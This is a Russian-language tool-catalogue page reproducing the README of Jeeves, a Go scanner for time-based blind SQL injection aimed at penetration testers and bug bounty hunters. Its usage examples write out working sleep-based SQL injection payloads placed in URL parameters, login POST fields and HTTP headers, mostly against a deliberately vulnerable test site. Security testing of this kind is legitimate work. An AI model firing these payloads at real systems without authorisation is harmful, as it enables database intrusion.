Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Jeeves — Инструмент для обнаружения time-based blind SQL-инъекций для разведки и bug bounty. Принимает отдельные URL или списки, поддерживает пользовательские заголовки, прокси и POST-данные для автоматического сканирования уязвимостей. | Kitploit
Инструменты/GitHubGitHub/ferreiraklet/jeeves
Сканеры уязвимостейВеб-безопасностьТестирование на Проникновение
GitHubferreiraklet/jeeves

Jeeves

Инструмент для обнаружения time-based blind SQL-инъекций для разведки и bug bounty. Принимает отдельные URL или списки, поддерживает пользовательские заголовки, прокси и POST-данные для автоматического сканирования уязвимостей.

Репозиторий
21550444 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

made-with-Go

Jeeves


Использование • Установка

Jeeves предназначен для поиска Time-Based Blind SQL-инъекций в процессе разведки.

Содержание:

  • Установка
  • Использование
    • Добавление заголовков
    • Использование прокси
    • POST-запрос
    • Другие способы использования

- Установка и требования:

Установка Jeeves 💀

root@kitploit:~
$ go install github.com/ferreiraklet/Jeeves@latest

ИЛИ

root@kitploit:~
$ git clone https://github.com/ferreiraklet/Jeeves.git
$ cd Jeeves
$ go build jeeves.go
$ chmod +x jeeves
$ ./jeeves -h

- Использование и объяснение:

В процессе разведки вы можете найти конечные точки, уязвимые для SQL-инъекций, Например: https://redacted.com/index.php?id=1

Одиночные URL

root@kitploit:~
echo 'https://redacted.com/index.php?id=your_time_based_blind_payload_here' | jeeves -t payload_time
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(10)))v)" | jeeves -t 10

В --payload-time вы должны указать время, упомянутое в пейлоаде


Из списка

cat targets | jeeves --payload-time 5

Добавление заголовков

Обратите внимание на синтаксис! Должен быть таким же =>

root@kitploit:~
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -H "Testing: testing;OtherHeader: Value;Other2: Value"

Использование прокси

root@kitploit:~
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 --proxy "http://ip:port"
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -p "http://ip:port"

Прокси + Заголовки =>

root@kitploit:~
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy "http://ip:port" -H "User-Agent: xxxx"

POST-запрос

Отправка данных через POST-запрос (формы входа и т.п.)

Обратите внимание на синтаксис! Должен быть одинаковым! ->

root@kitploit:~
echo "https://example.com/Login.aspx" | jeeves -t 10 -d "user=(select(0)from(select(sleep(5)))v)&password=xxx"
echo "https://example.com/Login.aspx" | jeeves -t 10 -H "Header1: Value1" -d "username=admin&password='+(select*from(select(sleep(5)))a)+'" -p "http://yourproxy:port"

Другие способы использования

Вы можете использовать Jeeves с другими инструментами, такими как gau, gauplus, waybackurls, qsreplace и bhedak, чтобы усилить его мощь.


Параметры командной строки:

root@kitploit:~
 Usage:
 -t, --payload-time,  Время из пейлоада
 -p, --proxy          Направлять трафик через прокси
 -c                   Уровень параллелизма, по умолчанию 25
 -H, --headers        Пользовательские заголовки
 -d, --data           Отправка POST-запроса с данными
 -h                   Показать это сообщение справки

Использование со списком пейлоадов SQL

root@kitploit:~
cat sql_wordlist.txt | while read payload;do echo http://testphp.vulnweb.com/artists.php?artist= | qsreplace $payload | jeeves -t 5;done

Тестирование в заголовках

root@kitploit:~
echo "https://target.com" | jeeves -H "User-Agent: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10
echo "https://target.com" | jeeves -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10

Пейлоад предоставлен: https://github.com/rohit0x5

ПРИМЕЧАНИЕ:

  • Не следует за перенаправлениями. Если код состояния отличается от 200, выводится "Need Manual Analisys"
  • Jeeves не выполняет HTTP-разведку; он не может отправлять запросы на URL, не содержащие протокол (http://, https://)

Этот проект предназначен только для образовательных целей и bug bounty! Я не поддерживаю никакие незаконные действия!.

Если возникли ошибки в программе, немедленно сообщите мне.

Пожалуйста, также ознакомьтесь с этими =>

Nilo - Проверяет статус URL (200)

SQLMAP

Blisqy - Time-based SQLI через заголовки

Скачать инструмент